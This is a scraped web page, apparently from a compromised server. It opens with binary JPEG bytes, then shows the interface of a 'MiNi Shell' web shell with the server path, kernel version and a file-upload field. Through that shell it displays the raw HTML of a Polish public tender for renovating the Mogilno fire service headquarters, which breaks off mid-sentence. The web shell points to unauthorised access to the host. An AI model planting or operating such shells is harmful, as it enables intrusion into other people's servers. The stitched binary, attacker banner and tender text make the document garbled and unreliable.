JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20201030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20201030/604363-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 604363-N-2020 z dnia 2020-10-30 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Komenda Powiatowa Państwowej Straży Pożarnej</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Remont wewnętrznej części budynku Komendy Powiatowej Państwowej Straży Pożarnej w Mogilnie wraz z remontem ogrodzenia i bramy</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Komenda Powiatowa Państwowej Straży Pożarnej</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">92361545000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. 900-Lecia</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">3</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">88-300</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Mogilno</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">kujawsko-pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">523152351</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">kwatermistrz@pspmogilno.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">523152651</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://kppspmogilno.binp.info/kppspmogilno/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Jednostki organizacyjne administracji samorządowej</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.kppspmogilno.binp.info</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pocztą, osobiście, kurierem</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Komenda Powiatowa Państwowej Straży Pożarnej, ul. 900-lecia 3, piętro I, pokój nr 2 (sekretariat)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Remont wewnętrznej części budynku Komendy Powiatowej Państwowej Straży Pożarnej w Mogilnie wraz z remontem ogrodzenia i bramy</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">PT.2370.02.2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia jest remont wewnętrznej części budynku Komendy Powiatowej Państwowej Straży Pożarnej w Mogilnie wraz z remontem ogrodzenia i bramy.2. Zadanie obejmuje remont 5 pomieszczeń wraz z montażem instalacji systemu powiadamiania i alarmowania (wyświetlacze) na placu komendy, w garażu oraz na klatce schodowej komendy, a także wymiana ogrodzenia i bram.3.	Budynek jest trzykondygnacyjny, usytuowany jest przy ul. 900-lecia 3 w Mogilnie. Pomieszczenia objęte remontem znajdują się na pierwszym oraz drugim piętrze i są połączone klatką schodową łącząca oba piętra. Budynek przeznaczony jest do celów socjalnych z podziałem na kuchnię, siłownię, salę konferencyjną, sanitariaty oraz pomieszczenia pomocnicze.4. Wszystkie dane zawarte poniżej wynikają z pomiarów i oględzin wykonanych przez Zamawiającego. Ich celem jest przedstawienie możliwie przybliżonego zakresu prac remontowych, jakie mają zostać wykonane w ramach umowy. Powierzchnia pomieszczeń objętych remontem to ok. 200 m2. Wysokość użytkowa kondygnacji 350 cm. 1)	KUCHNIA JRG:a)	skuwanie płytek ze wskazanych ścian i parapetu, skuwanie glazury z posadzki, demontaż lamp sufitowych, opcjonalnie demontaż sufitu podwieszanego i montaż nowego z płyt kasetonowych - 25m2, demontaż gniazd i przełączników, uzupełnienie ubytków, przygotowanie podłoża pod nowe płytki i pod malowanie, licowanie płytek ściennych i cokołu, ułożenie terakoty na posadzce – 25m2, wykonanie zabudowy istniejącej instalacji CO przebiegającej nad posadzką z terakoty – wykończenie listwą aluminiową na długości 5m. Pozostałe narożniki wykończone poprzez szlifowanie płytek, bez użycia dodatkowych narożników np. PCV. Wymiana glazury ściennej do wysokości min 208-210 cm oraz położenie pasa o szerokości 1 m i długości 5m na jednej ze ścian. Łączna powierzchnia płytek 22,5 m2. Wzór, wielkość, kolor do uzgodnienia z zamawiającym. Fugowanie przy pomocy masy niepowodującej powstawanie plam i wykwitów, o właściwościach hydrofobowych, oraz wykonaną z użyciem technologii, zapobiegającej rozwojowi grzybów i pleśni. Wykonawca przedstawi zamawiającemu do akceptacji co najmniej 3 wzory płytek ściennych, podłogowych, dekorów i parapetów o wysokich parametrach odporności na ścieranie i uszkodzenia mechaniczne. Malowanie sufitu, ścian (co najmniej dwa razy do uzyskania jednolitego koloru). Farba odporna na ścieranie i poplamienie, dedykowana do pomieszczeń kuchennych. Powierzchnia sufitu 25m2, ścian 13m2. Szpachlowanie, malowanie wnęki okiennej oraz demontaż obecnego i montaż nowego parapetu z konglomeratu o wymiarach 305 x 37 cm x 2 cm. Montaż gniazd i przełączników we wskazanych miejscach wraz z wymianą instalacji elektrycznej, doprowadzenie dwóch instalacji elektrycznych zasilającej gniazda elektryczne wykonanych z przewodu miedzianego płaskiego 3x2,5 750V YDYp – 90m. Zasilanie instalacji elektrycznej należy poprowadzić od skrzynki bezpiecznikowej usytuowanej na remontowanej klatce schodowej. Montaż paneli LED nadtynkowych 4 szt. o wymiarach 59,5cm x 59,5cm Szerokość ramki: 2,5cm Grubość/wysokość: 1cm Ilość lumenów: 3200Lm Moc: 40W. Kolor elementu z diodami: śnieżnobiały Kolor ramki: srebrny, aluminium. Temperatura światła: biały neutralny 4500K. Kąt świecenia: ok. 120° Ochrona IP: IP20 Temperatura pracy: -15 do +50st C Brak emisji promieniowania UV oraz podczerwieni, wymiana instalacji zasilającej w/w lampy oraz włącznik długość przewodu miedzianego 3x1,5 750V YDYp 20 metrów. Zakup i montaż 2 głośników sufitowych białych okrągłych szt. 2 min 15W oraz podłączenie do istniejącej instalacji radiowęzła – długość przewodu zasilającego 10 m.b)	Wykonanie, montaż kuchni na wymiar zgodnie z zaleceniami zamawiającego. Kupno oraz montaż AGD.-	Zabudowa kuchenna z płyty meblowej laminowanej o grubości 18mm z frontami wykonanymi z płyty MDF oklejonymi folią PVC w kolorze uzgodnionym ze zleceniodawcą, z uchwytem jednopunktowym w kolorze stali nierdzewnej lub szczotkowanego aluminium. Front okuty zawiasem puszkowym prostym ze spowalniaczem. Długość zabudowy kuchennej ok 4,8mb. Zabudowa składająca się z szafek górnych i dolnych w konfiguracji uzgodnionej z zamawiającym. Montaż pod szafkami górnymi oświetlenia led na całej długości szafek, w listwie aluminiowej, uruchamianie odbywać się będzie za pomocą włącznika zbliżeniowego zamocowanego w listwie led wraz z podłączeniem do istniejącej instalacji elektrycznej.-	Stół kuchenny z oskrzynią i nogami metalowymi, pomalowanymi farbą proszkową w kolorze zbliżonym do kolorystyki mebli kuchennych, blat stołu wykonany z blatu kuchennego o grubości 38mm o wymiarach 2500x1000 w kolorze blatu roboczego kuchennego.-	Szafki gospodarcze z płyty meblowej laminowanej o grubości 18mm w kolorze uzgodnionym ze zleceniodawcą, z półką, zamykane na klucz, z frontem wykonanym z płyty MDF oklejonym folią PVC w kolorze uzgodnionym ze zleceniodawcą, z uchwytem jednopunktowym w kolorze stali nierdzewnej lub szczotkowanego aluminium. Front okuty zawiasem puszkowym prostym ze spowalniaczem. Każda szafka o wymiarach ok 470x470x400, 36 sztuk. Po 12 szafek w jednym segmencie, każdy segment będzie się składał z trzech szafek poziomo oraz czterech pionowo. -	2 płyty gazowe pod zabudowę czteropalnikowe ze stali nierdzewnej lub szczotkowanego aluminium z żeliwnymi rusztami, z zapalarką zintegrowaną z pokrętłem, z zabezpieczeniem przeciwwypływowym.-	Kuchenka mikrofalowa do zabudowy o wymiarach wysokości 38.8cm, szerokości 59.9cm , głębokości 40cm.-	2 piekarniki elektryczne w kolorze stali nierdzewnej lub szczotkowanego aluminium, o pojemności minimum 77l, o wymiarach 595x595x575, pracujące na napięciu 230V.-	Lodówka wolnostojąca w kolorze stali nierdzewnej lub szczotkowanego aluminium o wymiarach (WxSxG) [cm] 186 x 59.5 x 68.2, pełny no Frost.-	2 okapy w kolorze stali nierdzewnej lub szczotkowanego aluminium do powieszenia na ścianie o szerokości dostosowanym do płyty gazowej (ok. 600mm) z możliwością podłączenia do wentylacji.-	Zlewozmywak dwukomorowy zrobiony ze stali nierdzewnej do zabudowy wraz z baterią. Dostawa i instalacja nowego wyposażenia: zlewozmywaka dwukomorowego wraz wpuszczanego w blat wraz z kompletną armaturą, wężykami, syfonami, płyty gazowej wraz z badaniem szczelności gazowej przez uprawnioną osobę wraz z wydaniem zaświadczenia o szczelności instalacji gazowej, montaż okapu kuchennego wraz z podłączeniem do otworu wentylacyjnego, wykonanie zasilania 230 V dla w/w okapu.2)	KORYTARZ 1 PIĘTRODemontaż 8 lamp oświetleniowych oraz urządzeń alarmowych (głośniki wyświetlacze), montaż sufitu podwieszanego kasetonowego na konstrukcji stelażowej wykonanej z profili metalowych, kolor kasetonów biały – 36m2. Montaż nowego oświetlenia typu led w kasetonach. 8 Lamp typu plafon o wymiarach 59,5cm x 59,5cm Szerokość ramki: 2,5cm Grubość/wysokość: 1cm Ilość lumenów: 3200Lm Moc: 40W. Kolor elementu z diodami: śnieżnobiały Kolor ramki: srebrny, aluminium. Temperatura światła: biały neutralny 4500K. Kąt świecenia: ok. 120° Ochrona IP: IP20 Temperatura pracy: -15 do +50st C Brak emisji promieniowania UV oraz podczerwieni. Wymiana 3 opraw oświetleniowych instalacji alarmowej 24V. Oprawa z tworzywa sztucznego okrągła lub kwadratowa koloru białego, Barwa światła 4000K Strumień świetlny 960lm, wskaźnik oddawania barw >80, zasilanie 24V DC, moc 12W, klasa energetyczna A, klasa ochronności I, stopień szczelności (IP) IP44, liczba cykli on/off 30000, trwałość 30000h, współczynnik mocy >0.9, wymiary fi 260 mm. Wymiana i montaż instalacji elektrycznej zasilającej w/w lampy, włączniki 5 szt. oraz gniazda elektryczne w ilości 3 szt. instalacja oświetleniowa wykonana z przewodu miedzianego płaskiego 3x1,5 750V YDYp – 30 m, instalacja zasilająca gniazda elektryczne wykonana z przewodu miedzianego płaskiego 3x2,5 750V YDYp – 20 m. Zasilanie instalacji elektrycznej należy poprowadzić od skrzynki bezpiecznikowej usytuowanej na remontowanej klatce schodowej. Wykonawca dokona obniżenia urządzeń zamocowanych na ścianach i suficie oraz przedłużenie instalacji elektrycznych ich zasilającej, które poprzez obniżenie sufitu będą kolidować z konstrukcją sufitu. Ściany, przygotowanie powierzchni starych tynków do malowania farbami emulsyjnymi łącznie z szpachlowaniem nierówności gipsem, usunięciem pęknięć oraz luźnych części powierzchni tynku. Przygotowanie do malowania, malowanie ścian (co najmniej dwa razy do uzyskania jednolitego koloru). Kolor farby na ściany do uzgodnienia z zamawiającym. Farba odporna na ścieranie i poplamienie. Powierzchnia ścian do malowania 40 m2. Lamperia - oczyszczenie, uzupełnienie ubytków przygotowanie powierzchni do nałożenia oraz nałożenie cienkowarstwowego tynku mozaikowego od poziomu cokolika na wysokość 145cm powierzchnia 48m2. Kolor, struktura, gęstość mozaiki na lamperie do uzgodnienia z zamawiającym. Lamperia mozaikowa na korytarzu podziału bojowego należy połączyć z lamperią mozaikową klatki schodowej komendy. Montaż 11 listew ściennych narożnikowych metalowych (narożnik Stal Nierdzewna 40x40mm; 1,45m). Zakup i montaż 3 głośników sufitowych białych okrągłych szt. 2 min 15W oraz podłączenie do istniejącej instalacji radiowęzła – długość przewodu zasilającego 20 m. Po zakończeniu prac wykonawca zamontuje wcześniej zdemontowany osprzęt na ścianach oraz zamontuje nowy osprzęt.3)	KORYTARZ II PIĘTRODemontaż 7 lamp oświetleniowych oraz urządzeń alarmowych (głośniki wyświetlacze), montaż sufitu podwieszanego kasetonowego na konstrukcji stelażowej wykonanej z profili metalowych, kolor kasetonów biały – 29 m2. Montaż nowego oświetlenia typu led w kasetonach. 8 Lamp typu plafon o wymiarach 59,5cm x 59,5cm Szerokość ramki: 2,5cm Grubość/wysokość: 1cm Ilość lumenów: 3200Lm Moc: 40W. Kolor elementu z diodami: śnieżnobiały Kolor ramki: srebrny, aluminium. Temperatura światła: biały neutralny 4500K. Kąt świecenia: ok. 120° Ochrona IP: IP20 Temperatura pracy: -15 do +50st C Brak emisji promieniowania UV oraz podczerwieni. Wymiana 2 opraw oświetleniowych instalacji alarmowej 24 V. Oprawa z tworzywa sztucznego okrągła lub kwadratowa koloru białego, Barwa światła 4000K Strumień świetlny 960lm, wskaźnik oddawania barw >80, zasilanie 24V DC, moc 12W, klasa energetyczna A, klasa ochronności I, stopień szczelności (IP) IP44, liczba cykli on/off 30000, trwałość 30000h, współczynnik mocy >0.9, wymiary fi 260 mm. Wymiana i montaż instalacji elektrycznej zasilającej w/w lampy, włączniki 4 szt. oraz gniazd elektrycznych w ilości 3 szt. instalacja oświetleniowa wykonana z przewodu miedzianego płaskiego 3x1,5 750V YDYp – 30 m, instalacja zasilająca gniazda elektryczne wykonana z przewodu miedzianego płaskiego 3x2,5 750V YDYp – 20 m. Zasilanie instalacji elektrycznej należy poprowadzić od skrzynki bezpiecznikowej usytuowanej na remontowanym 2 piętrze. Wykonawca dokona obniżenia urządzeń zamocowanych na ścianach i suficie oraz przedłużenie instalacji elektrycznych ich zasilającej, które poprzez obniżenie sufitu będą kolidować z konstrukcją sufitu. Ściany, przygotowanie powierzchni starych tynków do malowania farbami emulsyjnymi łącznie z szpachlowaniem nierówności gipsem, usunięciem pęknięć oraz luźnych części powierzchni tynku. Przygotowanie do malowania, malowanie ścian (co najmniej dwa razy do uzyskania jednolitego koloru). Kolor farby na ściany do uzgodnienia z zamawiającym. Farba odporna na ścieranie i poplamienie. Powierzchnia ścian do malowania 44m2. Lamperia - oczyszczenie, uzupełnienie ubytków przygotowanie powierzchni do nałożenia oraz nałożenie cienkowarstwowego tynku mozaikowego od poziomu cokolika na wysokość 145cm powierzchnia 49m2 Kolor, struktura, gęstość mozaiki na lamperie do uzgodnienia z 